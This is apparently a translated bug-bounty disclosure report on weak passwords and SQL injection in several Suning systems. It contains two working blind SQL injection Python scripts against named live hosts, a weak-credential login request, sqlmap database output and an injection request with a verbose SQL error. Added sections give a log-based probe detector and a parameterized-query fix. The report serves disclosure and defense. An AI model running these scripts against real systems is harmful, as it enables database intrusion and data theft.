Vulnerability summary
Title: Multiple Suning systems have large numbers of weak passwords & SQL injection
Submitted: 2015-11-27 14:01
Fixed: 2016-01-11 15:32
Published: 2016-01-11 15:32
Vulnerability type: weak admin-panel password
Severity: High
Self-assessed Rank: 20
Status: confirmed by vendor
Tags: none
Vulnerability details
Disclosure status:
2015-11-27: Details sent to the vendor, awaiting the vendor's response
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and domain experts
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
Brief description: Multiple Suning systems have large numbers of weak passwords & SQL injection
Detailed description:
Admin note: the injection points involved in this case have all been submitted and covered in earlier reports; they are handled together as one bundle.

1. http://online.suning.com/console/Service/Console/Index
Only a few of the weak-password accounts were tried.
Injection:
```python
#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib

headers = {'Content-Type': 'application/x-www-form-urlencoded',
           'X-Requested-With': 'XMLHttpRequest',
           'Proxy-Connection': 'keep-alive',
           'Referer': 'http://online.suning.com/console/Service/supplieradmin/customerIndex',
           'Cookie': 'JSESSIONID=4CEBAE01446F679F9024276C9F7F00B6',
           'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36'}

payloads = list(string.ascii_uppercase)
#payloads = list('T')

print 'start to retrive Oracle user:'
user = ''
# boolean-blind probe: one request per (character position, candidate character)
for i in range(1, 7):
    for payload in payloads:
        conn = httplib.HTTPConnection('online.suning.com', timeout=60)
        params = {
            'filterParams': "user_name like '%1%' and ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s" % (i, ord(payload)),
            'page': '1',
            'rows': '20',
            'sort': 'companyName',
            'order': 'asc',
            'customerId': '',
        }
        #print urllib.urlencode(params)
        conn.request(method='POST', url='/console/Service/supplieradmin/pageCustomer',
                     body=urllib.urlencode(params), headers=headers)
        resp = conn.getresponse()
        html_doc = resp.read().decode('utf-8')
        conn.close()
        #print html_doc
        print '.',
        # a 'userName' field in the response means the injected condition was true
        if html_doc.find(u'userName') > 0:  # True
            user += payload
            print '\n[in progress]', user
            break
print '\nOracle user is', user
```
Proof of vulnerability:
2. http://58.240.86.236 cannot be accessed. Under http://58.240.86.236/download/ I found an iOS package, but my device is not jailbroken, so I could not install it.
With no other option, I scanned directories first.
Surprisingly... they were accessible...
The 8-digit employee IDs could be brute-forced further.
Injection: http://weibo.cnsuning.com/ajax.php?mod=member&code=sel&type=top&province=1&hid_city=
```python
#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib

headers = {'Content-Type': 'application/x-www-form-urlencoded',
           'X-Requested-With': 'XMLHttpRequest',
           'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36',
           'Cookie': ' _wbma=weibo.cnsuning.com%7C14353112666246444095519302%7C1435311266624%7C1435736372201%7C1435736405085%7C81%7C3; _wbmc=weibo.cnsuning.com; _wbmb=14357360303501756793251744%7C%7C%7C22;jishigou_YnQbd2_auth=b894Q1QF2ymXvAaat%2BBJ0dwP0InpJNhi3zGtCB30mGyR2Q4BH7uk%2Bf%2F%2FQKxTY%2Bysci6B4luF2L1gMgNn6on8SHIcKw; jishigou_YnQbd2_login_credits=1435736257; jishigou_YnQbd2_sid=DPZcJd',
           'X-Forwarded-For': '192.168.121.194'}

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

print 'start to retrive Current database name :'
user = ''
# boolean-blind probe: one request per (character position, candidate character)
for i in range(1, 6):
    for payload in payloads:
        conn = httplib.HTTPConnection('weibo.cnsuning.com', timeout=120)
        conn.request(method='GET',
                     url='/ajax.php?mod=member&code=sel&type=top&province=1/**/and/**/ascii(substr(database(),%s,1))=%s' % (i, ord(payload)),
                     headers=headers)
        resp = conn.getresponse()
        html_doc = resp.read()
        conn.close()
        #print html_doc
        print '.',
        # 'value=41' in the response means the injected condition was true
        if html_doc.find('value=41') > 0:  # True
            #print bb
            user += payload
            print '\n[in progress]', user
            break
print '\nCurrent Database name is', user
```
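Detection logic for the kind of probes the two scripts above generate, as an added example that is not part of the original report: it parses constructed access-log lines (combined log format, documentation-range IPs), undoes percent-encoding and /**/ comment obfuscation, flags ascii(substr(...)) character-extraction conditions, and counts probes per source and path, since blind extraction needs one request per candidate character.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines modelled on the probes above; not real traffic.
LOG_LINES = [
    '203.0.113.5 - - [27/Nov/2015:14:01:00 +0800] "GET /ajax.php?mod=member&code=sel&type=top&province=1/**/and/**/ascii(substr(database(),1,1))=97 HTTP/1.1" 200 512',
    '203.0.113.5 - - [27/Nov/2015:14:01:01 +0800] "GET /ajax.php?mod=member&code=sel&type=top&province=1/**/and/**/ascii(substr(database(),1,1))=98 HTTP/1.1" 200 512',
    '203.0.113.5 - - [27/Nov/2015:14:01:02 +0800] "GET /ajax.php?mod=member&code=sel&type=top&province=1%2F%2A%2A%2FAND%2F%2A%2A%2FASCII%28SUBSTR%28database%28%29%2C1%2C1%29%29%3D99 HTTP/1.1" 200 512',
    '198.51.100.7 - - [27/Nov/2015:14:01:03 +0800] "GET /ajax.php?mod=member&code=sel&type=top&province=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [27/Nov/2015:14:01:04 +0800] "GET /workOrder/workOrderContent.htm?keyword=printer&pageNumber=1 HTTP/1.1" 200 210',
    '203.0.113.5 - - [27/Nov/2015:14:01:05 +0800] "GET /workOrder/workOrderContent.htm?keyword=1%27&pageNumber=1 HTTP/1.1" 500 300',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# Character-extraction primitives that boolean-blind scripts wrap around a comparison.
PROBE_RE = re.compile(r'\b(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\(', re.I)

def normalize(url):
    # Decode twice to undo double-encoding, then collapse inline comments and whitespace
    # so '/**/and/**/' and its percent-encoded form look the same to the regex.
    s = unquote_plus(unquote_plus(url))
    s = re.sub(r'/\*.*?\*/', ' ', s)
    return re.sub(r'\s+', ' ', s).lower()

def classify(line):
    """Return (ip, path, verdict) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m['url'].split('?', 1)[0]
    url = normalize(m['url'])
    if PROBE_RE.search(url):
        verdict = 'blind-sqli-probe'
    elif "'" in url and m['status'] == '500':
        verdict = 'quote-error'   # lone quote plus server error: the sws.suning.com case
    else:
        verdict = 'ok'
    return m['ip'], path, verdict

def scan(lines, burst=3):
    """Return {(ip, path): hits} for sources whose probe count reaches the burst threshold."""
    hits = Counter()
    for line in lines:
        r = classify(line)
        if r and r[2] == 'blind-sqli-probe':
            hits[(r[0], r[1])] += 1
    return {k: n for k, n in hits.items() if n >= burst}
```

Access logs only record the query string, so the POST body probe of the first script (the filterParams field) is invisible here and needs request-body logging or WAF inspection to catch.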
3. http://fota.suning.com/ and http://bug2go.suning.com/

```
POST / HTTP/1.1
Host: 218.2.113.254
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://218.2.113.254/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

formhash=73350ae2&login=1&username=123&password=123
```

```
available databases [3]:
[*] bug2go
[*] information_schema
[*] test
```

```
GET /workOrder/workOrderContent.htm?noCache=1448209074131&active=&keyword=1'&pageNumber=1 HTTP/1.1
Host: sws.suning.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://sws.suning.com/console.html
Cookie: _device_session_id=p_035d5322-bebf-43df-a4b0-32eb3078fd91; _customId=s5aac5bb0281; Hm_lvt_bc611aeb03796ac6788544b9a75ff641=1448208897; Hm_lpvt_bc611aeb03796ac6788544b9a75ff641=1448208933; _snma=1%7C144820889823549650%7C1448208898235%7C1448208923889%7C1448208932488%7C3%7C1; _snmc=1; _snsr=direct%7Cdirect%7C%7C%7C; _snmb=144820889825797119%7C1448208932498%7C1448208932492%7C3; _snmp=144820893248587390; __wmv=1448208899.1; __wms=1448210699; authId=siE8C38068EFF3ED6F11FFBE119685A4B8; custno=6132453427; idsLoginUserIdLastTime=653143550%40qq.com; logonStatus=2; nick=65***0%40qq.com; nick2=65***0%40qq.com; ZONE_ID=z-nj1; JSESSIONID=uVnq8S5rDC8J8lkjl4Ec1nBC.master:server-one
Connection: keep-alive
```

Response:

```
{"message":"PreparedStatementCallback; bad SQL grammar [SELECT COUNT(*) count FROM T_WORK_ORDER A, SPCU.T_USER_INFO B WHERE A.STATUS = 1 AND A.USER_ID = B.ID AND A.USER_ID = ? AND (A.UUID like '%1'%' OR A.TITLE like '%1'%') ]; nested exception is com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR A.TITLE like '%1'%')' at line 1","result":"false"}
```
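The error above shows a PreparedStatement whose user ID is bound but whose keyword is concatenated into two LIKE patterns. The following is an added example, not code from the report or from Suning: it reproduces that query shape against an in-memory SQLite table (a constructed stand-in for T_WORK_ORDER) next to a version that binds the pattern and escapes LIKE wildcards, which is the fix the report leaves unstated.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the work-order table named in the error message.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE t_work_order (uuid TEXT, title TEXT, status INT)")
    db.executemany("INSERT INTO t_work_order VALUES (?, ?, 1)",
                   [("1a2b", "printer broken"), ("100%_done", "progress"), ("zz", "other")])
    return db

def count_vulnerable(db, keyword):
    # Same shape as the failing query: the keyword is spliced straight into both LIKE patterns.
    sql = ("SELECT COUNT(*) FROM t_work_order WHERE status = 1 "
           "AND (uuid LIKE '%" + keyword + "%' OR title LIKE '%" + keyword + "%')")
    return db.execute(sql).fetchone()[0]

def vulnerable_raises(db, keyword):
    # True when the keyword breaks the statement, the 'bad SQL grammar' case in the report.
    try:
        count_vulnerable(db, keyword)
        return False
    except sqlite3.OperationalError:
        return True

def like_escape(s):
    # Escape LIKE metacharacters so a user-supplied keyword matches literally:
    # a bound parameter stops injection, but not the % and _ wildcards.
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")

def count_fixed(db, keyword):
    # Bound parameters: the keyword never becomes SQL text, whatever it contains.
    pattern = "%" + like_escape(keyword) + "%"
    sql = ("SELECT COUNT(*) FROM t_work_order WHERE status = 1 "
           "AND (uuid LIKE ? ESCAPE '\\' OR title LIKE ? ESCAPE '\\')")
    return db.execute(sql, (pattern, pattern)).fetchone()[0]
```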
Fix recommendation: (none given)

Vulnerability response
Vendor response: Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-11-27 14:16
Vendor reply: The system in issue 1 is about to be decommissioned; issue 3 was already known from another platform. Issue 2 is being confirmed.
Latest status: none